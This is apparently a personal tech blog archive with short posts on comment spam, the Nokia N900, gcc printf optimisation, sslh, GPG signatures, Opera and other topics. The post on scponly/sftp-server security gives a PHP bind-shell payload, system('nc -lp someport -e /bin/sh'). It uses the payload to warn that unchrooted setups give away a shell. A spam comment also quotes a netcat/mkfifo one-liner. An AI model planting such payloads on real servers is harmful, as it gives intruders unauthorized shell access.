It is possible with s9y to moderate blog comments after a certain amount of time has passed since the article was published.
A while back I got the following mail to approve a blog comment (I stripped the url and email address to not support the spam):

Mon, 19 Oct 2009 12:18:02 +0200 (CEST)
A new comment has been posted on your blog "nion's blog", to the entry entitled "security of scponly/sftp-server in combination with apache".
Link to entry: http://nion.modprobe.de/blog/archives/679-security-of-scponlysftp-server-in-combination-with-apache.html

Requires review: Yes (Auto-moderation after X days)
User IP-address: 24.123.215.XXX
User Name: SomeSpammer
User Email: webmaster@somespammer.com
User Homepage: http://www.somespammer.com

Comments:
Very interesting, seems so simple when you explain it like that.. nice one

This is quite obviously a spam comment to increase google ranks or site links in general.

Today I got a new comment:

Fri, 19 Mar 2010 02:35:54 +0200 (CEST)
A new comment has been posted on your blog "nion's blog", to the entry entitled "security of scponly/sftp-server in combination with apache".
Link to entry: http://nion.modprobe.de/blog/archives/679-security-of-scponlysftp-server-in-combination-with-apache.html

Requires review: Yes (Auto-moderation after X days)
User IP-address: 96.30.18.XXX
User Name: SomeSpammer
User Email: webmaster@somespammer.com
User Homepage: http://www.somespammer.com/

Comments:
Weird.. I found myself back here! small world. Reminds of this one from the commmandline kung fu of wietse.

( ( mkfifo ~/nc-feef && ( ( nc -v -l -p 22123 127.0.0.1 > ~/out ) & ) && ( ( cat /tmp/ncf | nc 127.0.0.1 22123 ) & ) && script -f ~/nc-feef ) & )

This comment is pointing to the same spammer site. Now comparing this comment to the first one at the first glance it seems even related to the blog post! Thinking of "wietse" the name Wietse Venema (author of postfix) pops up, so this also familiar.

Though opening a fifo in the home directory, a netcat listening tcp port on localhost with the output redirected to a file and then some tmp file piped to the listening port (thus writing the file) and attaching script to the FIFO doesn't really make sense?! Not that this is usually the case with spam, but wtf this is everything but obviously spam. If you have a blog that is commented highly frequent it might be a problem to sort that out and spot that even if it's not interesting to you. This is the difference to email, if it's spam, you don't notice but it's also not interesting you will just delete the mail. Using a blog you might approve such a comment as it might be interesting for another reader and you don't have time to read that in detail.

So this spam hit me 6 months after the first attempt again! It's interesting to see how spam evolves over time, this one clearly has been improved.

Now spam bots are producing code. This is scary. It will be interesting to see if and what comment I get from the guy on this article

... or you search for int main(int argn, char **argc) (I was looking for source code snippets that do not use the typical int argc, char **argv names) the google code search behaves rather strangely.

The first result you get is:


this is not too surprising as the google code search features regexes and * is a reserved symbol in POSIX extended regular expressions but at least the recommendation of int argn, char "main(int" "**argc)" is a bit surprising.

Searching for this actually results in a function that matches the string you wanted to search for originally. So far so good, I didn't look into the codesearch syntax in detail, so this might make sense.
The result looks like:

i
Note that the result has 9 pages (the screenshot is missing this detail) but also only 9 results. The first question that arises is: Why do they only display one result on the page instead of n (usually they do display more)?

Looking at the other pages it becomes confusing. On page 2 this looks like:


Now where have pages 4-9 been gone? Ok, to be fair, google sometimes strips additional search results if the content is too similar, this is not too surprising.

But then, visiting page 3 you get:


Tada, pages are there again!
At this point I am/was totally confused and am really wondering what the idea behind this behaviour is.
If someone is using the google codesearch more frequently (or even is a google employer) please enlighten me!

Two weeks ago I got myself a nokia n900 phone which is running maemo 5. So far I am quite happy with it, given that my previous phone was a sony erricsson p1i which is pretty crappy.
I've taken some notes about my experiences:

• under normal use the battery lasts for ~ 2 days, if I'm using 3G the whole day I need to recharge it daily though


• the terminal has a bug which results in the enter key not working under some conditions, ctrl-m works as a workaround though


• playing normal dvdrips in mplayer is absolutely no problem without downscaling, 720p doesn't perform though


• I somehow managed that my screen flipped and I wasn't able to flip it back, only a reboot solved that


• It is not clear to me which tools you will find in the list of installable packages and which are only visible with apt-cache search. I also managed to end up with a doubled launch icon in my application list for some application


• the termininal is not usable anymore after an ncurses program crashed, "reset" doesnt help either


• wireless uses less battery than umts, way less


• the back button in the browser is per default opening a fancy eyecandy browse history which is slow, so I mostly use backspace to browse back


• there is lots of useful tools in the extras-devel repository, e.g. I can control my mpd via mmpc from the phone which is great



• importing contacts works flawlessly, also merging existing contacts works as expected


• jabber (including xmpp calls) are integrated in the contacts information (you can merge a jabber uid into an existing contact)


• i've no idea yet what the internal video player is, but i wasn't able to play a non downscaled XviD file with it, mplayer does play it fine


• freely placeable widgets are awesome


• it's is really userfriendly and no geeky linux user phone


• i would prefer not having busybox per default, i can install bash but the libc is still from busybox which implies world readable password hashes in /etc/passwd, so no other user accounts on my mobile


• is there disk encryption available?


• n900fly can't cause any good


• gps with nokia maps is ok and I find it pretty usable even if a google maps client would be nice as well


• the mp3 mplayer sucks unless you have tagged your music properly, you can't just play some folder without having a playlist for it


• mplayer as an alternative from the console is no real alternative either, if you don't redirect its output to /dev/null it gets stuck in a loop when the display blanks,


• app manager locks dpkg lock even if you just list available programs, no idea why this is needed and no idea how aptitude and synaptic are doing this


• is there a good todo manager which comes with a widget listing todos?


• is it possible to install armel debian packages without having a debian chroot?


• sms are nicely organized per contact in an instant messaging fashion


• the builtin accelerator works nice and you can automatically flip the screen when you want to dial a number, sometimes happens by accident though


• the multiuser support works awesome and you get a nice overview of open applications in a composé fashion, it may be wise to have not 40 applications open though


• the list of processes is already huge (like 160 processes running in the background)


• i haven't checked out the sdk yet but I will do that soon as I need e.g. newsbeuter for RSS


• hardware feels robust, arm cortex a8 is imho a very good processor, RAM could be more (the phone is heavily swapping)


• you can not yet use the phone as a wireless access point without building your own kernel images, some people seem to be working on this


• you can manipulate all kinds of stuff through the sysfs, including the phone led and the vibration


• wireless certificates are sometimes shown to be invalid but there there is no details button, you can click only "done"

Those are the things I came up with while using the phone. The calling functionality and everything which is only phone related really works fine and the sound quality while talking to someone on the phone is also really good. So far I am really happy with the phone and I can only recommend it. I hope I'll have some time to port some applications to maemo soon.

I always hated garden gnomes and was under the impression that only old people collect them. But I have to realize that I just discovered the love to garden gnomes when I saw the Noam Chomsky garden gnome.


http://www.justsaygnome.net/gnomes-noams--oms---products---ordering.html

If you ever feel like sending me a gift, send me one of those
Too bad there's also a bunch of other important people I would like to as garden gnomes! If there is a business around that please leave a comment.

From 3AM on Wednesday November 25, 2009, until 3AM the following day (US east coast time), WikiLeaks released half a million US national text pager intercepts. The intercepts cover a 24 hour period surrounding the September 11, 2001 attacks in New York and Washington.


The messages were broadcasted "live" to the global community — sychronized to the time of day they were sent. The first message was from 3AM September 11, 2001, five hours before the first attack, and the last, 24 hours later.


Text pagers are usualy carried by persons operating in an official capacity. Messages in the archive range from Pentagon, FBI, FEMA and New York Police Department exchanges, to computers reporting faults at investment banks inside the World Trade Center

Wow, this is an interesting release! I am not yet sure if I completely like it as it probably also carries a lot information that is not in the public interest and maybe shouldn't be public but nonetheless it is interesting to see this.
More info on: http://911.wikileaks.org/ (index).

This in combination with the release of the Toll Collect contracts really made my day. Thanks wikileaks! You are doing a great job!

Just a short note, I am still alive Just being very busy with my studies and certain aspects in real life.

But there is a thing I really would like to share now and that is an attempt to visualize the Mandelbrot set in 3D. I haven't seen something like that before but it is really awesome.



The story behind that and lots of interesting pictures at: http://www.skytopia.com/project/fractal/mandelbulb.html

A lot of people used to configure their ssh servers to listen to a port different from 22 to prevent their logs getting filled with login attempts by script kiddies. I just stumbled over sslh which is a very nice alternative to that in case you have a webserver running which supports ssl. sslh is also a good choice if you are behind a corporate firewall and ssh is filtered while SSL is probably not (and this is simpler than tunneling).

The idea is pretty simple but cool. The daemon listens on port 443 and depending on whether the client has written something into the socket (SSL) or not (SSH) after connecting the daemon "forwards" the connection to the listening service running on the same host. In case of SSL/HTTPS the client will send a request after the handshake and in case of ssh it won't. Pretty simple. I just did a quick test on one of my hosts and it seems to work great. The tool is written in C, consists of < 500 SLOC and the code looks clean to me. If you're using Debian you can just apt-get install it.

Today I had a nice WTF moment. I was looking into when gcc is going to print (null) rather than segfaulting on trying to dereference a NULL pointer. I knew newer gcc versions are doing that in some situations. But it turns out this is more complex than I initially thought.

So here we have 5 little test programs:

Now I expected some kind of consistent behaviour at least apart from the last snippet as from the C programming point of view the source does exactly the same. But it seems this is not the case.

The first snippet is straightforward, even in the generated assembler the code dereferences a NULL pointer in puts and therefore results in a segfault. But wasn't it printf from the GNU libc that replaces such cases with (null)? Yes it was but it turns out only in some cases. Now here is the fun part. If we look at the generated code for the first example we see:



Huh? puts? Now that is interesting. It seems like gcc sees the format string "%s\n" and after that a pointer (void *) so it assumes the usage of puts does make sense so it optimizes the call.
Now for the second code snippet this is not the case:


In this case gcc sees the format string and an integer so it can't just use this with puts in a way that makes sense. printf is used and the result is (null).

Until this point the behaviour is somehow predictable at least if you know that.
But it becomes even more strange. The third and the fourth example both result in the usage of printf and therefore the displayed result is (null). In my opinion it seems that gcc is testing exactly for "%s\n" (as puts prints a newline at the end anyway). So these two examples don't segfault as well. If there's a newline gcc is - or at least that's my impression - already concatenating the format string with the pointer value.

In the last case the newline is present again. However there is a leading string in front of the format string %s. Here gcc is not seeing this as a whole thing concatenating it and calling puts. It's using printf again and results bla: (null).

I have no idea what the reason behind this behaviour is, I guess there are good arguments for that by the gcc people. But honestly, it SUCKS and is highly inconsistent, *grrr*. The whole behaviour isn't even consistent between different gcc versions.

The above results are tested with gcc (Debian 4.3.4-2) 4.3.4. I also tested with gcc (GCC) 3.4.3, in this case all of the above examples result in a segmentation fault (not sure when this (null) replacement feature in the glibc was introduced though). You can also disable this "optimization" by using -fno-builtin-printf btw.

While I am not a fan of scponly/sftp-server (openssh) many people are still using it to give users the possibility to up/download files from the host without the need to provide them with shell access. If you do a simple setup like http://www.debian-administration.org/articles/94 or configure scponly without using a chrooted environment and you do this on host that also has a standard webserver setup (apache serving per-user home directories and php) you already lost.

The user won't be able to login with the username you gave him but he can remotely login via your webserver now. All that needs to be done is:

• Connect to the host using sftp


• $ mkdir public_html


• $ cd public_html; put index.php; chmod 644 index.php


• point your browser to http://host/~user/


• connect netcat to host:someport

index.php would just contain something like <? system("nc -lp someport -e /bin/sh"); ?> and you end up with a shell as www-data (on Debian).

It's pretty easy to make errors or miss important things in such a setup and I think it's almost always a better solution to either trust people and give them access via ssh or give them no access at all.

As some pointed out one can make the resigning a lot easier in case you also used digest 2 signatures. Still it's quite a lot of work to remove the digest 2 sigs you already imported. If you are sending your keys to keyservers on a regular basis but not since debconf, it might make sense to remove your pubkey completely, import it back again, do something like:
for i in $(gpg --list-sigs $DEBSIGN_KEYID| grep '^sig' |sed -r -e 's/sig [0-3]* .*([A-F0-9]{8}) .*/\1/'); do gpg --recv-key $i; done

and then work on reimporting proper signatures. At least that's what I am doing now.
This way of course I lose all other keys that I imported in the past but imho that's worth the hassle of delsig in comparison.
HTH

Yay the nominations for this year's pwnie awards are out. As in the last years this is a collection of security incidents, lifetime achievements of security researchers and the security community in general which will have the chance to win this awesome award.
The categories this year are:

• Pwnie for Best Server-Side Bug


• Pwnie for Best Client-Side Bug


• Pwnie for Mass 0wnage


• Pwnie for Most Innovative Research


• Pwnie for Lamest Vendor Response


• Pwnie for Most Overhyped Bug


• Pwnie for Best Song


• Pwnie for Most Epic FAIL (new for 2008)


• Pwnie for Lifetime Achievement (new for 2008)

I'm looking forward to the winner announcements which will be announced on July 29th at the blackhat conference.

If startpanic already shocked you, have a look at: http://www.making-the-web.com/misc/sites-you-visit/nojs/.

The latter version works without javascript so NoScript won't help you but the results are also not that great as it requires a pre-compiled list of possible visisted URLs which the startpanic doesn't need. But still, very impressive.

Flight tickets booked:
SXF->MAD:
Thu 23.07. 07:40->10:55
MAD->SXF:
Fr. 31.07. 20:20->23:15

From Madrid I'll head to Cáceres by train, haven't booked yet but ~ 15 Euros for booking online looks like a good price.
I'm looking forward to meet some old friends as well as getting to know new people! It'll be my first debconf actually.

After almost a year a new phrack release is out there.
Check it out on: http://www.phrack.org/issues.html?issue=66.

I'm especially looking forward to an article about radare which is a very promising looking reverse-engineering toolkit for *nixes with which I've been playing around recently.

I just tried the new 10 beta version of opera and I have to say it feels shitty (or at least not better than older releases).
One of the new features that was announced by the opera people is a configurable speeddial. There are 3 new things I noticed. The first thing is a configuration dialog which allows you to change the number of speed dials:


While some people might find this nice it somehow sucks as the values are predefined and there is a much more flexible way of configuring that (~/.opera/speeddial.ini):

With 10 beta you can also hide the speeddial. This is really neat as this wasn't possible before from what I know and some people seem to don't like it.
The dialog also allows you to set a background image to your speeddial. WTF, this is a browser, not my desktop

Another new feature I noticed is the possibility to expand the tab listing and pull it down so they show up with included screenshots.

There is no shortcut to open/close this but you have to do this with the mouse + I think this is really annoying while browsing, it's just too big and doesn't add much information while it's open if you don't intend to change the tab.

The most positive impression is that this version finally scores 100% in the acid 3 test!

One new feature left that really bugs me: Opera Turbo (F12). With this enabled opera behaves like opera-mini meaning you are sending every HTTP request to an opera server, get it back compressed and you render the compressed version. This should be useful for people with low bandwidths. I have no idea if this is more effective than just switching of images or other parts of the content but this is really a security/privacy no-go. For mobile devices it might makes sense as the bandwidth is almost always limited (though there is a lot of change in progress) but for desktop end user browser!? At least there should be a big fat privacy notice pinned to this option and naming it Opera Proxy instead of Turbo would also be very nice!

UPDATE: another thing came to my mind, what about censorship in countries? Does the opera compression server enforce laws from countries? If not Turbo is at least a nice and end-user friendly way to avoid censorship in the www.